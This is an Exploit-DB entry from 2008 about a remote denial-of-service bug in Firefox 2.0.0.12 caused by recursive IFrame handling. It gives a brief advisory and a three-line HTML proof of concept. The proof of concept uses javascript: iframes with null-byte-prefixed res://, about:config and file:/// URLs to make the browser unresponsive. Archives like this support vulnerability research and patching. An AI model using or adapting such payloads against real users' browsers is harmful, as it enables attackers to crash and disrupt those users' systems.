Mozilla Firefox 2.0.0.12 IFrame Recursion Remote Denial of Service Vulnerability

2008-02-15T00:00:00
ID EDB-ID:31203
Type exploitdb
Reporter Carl Hardwick
Modified 2008-02-15T00:00:00

Description

Mozilla Firefox 2.0.0.12 IFrame Recursion Remote Denial of Service Vulnerability. Dos exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/27812/info

Mozilla Firefox is prone to a remote denial-of-service vulnerability because of the way the browser handles IFrames.

Attackers can exploit this issue to make the browser unresponsive and cause denial-of-service conditions.

Firefox 2.0.0.12 is vulnerable; other versions may also be affected. 

<iframe id="x" src="javascript:document.location='\x00res://'" width="100%" height="200"></iframe>
<iframe id="y" src="javascript:document.location='\x00about:config'" width="100%" height="200"></iframe>
<iframe id="z" src="javascript:document.location='\x00file:///'" width="100%" height="200"></iframe>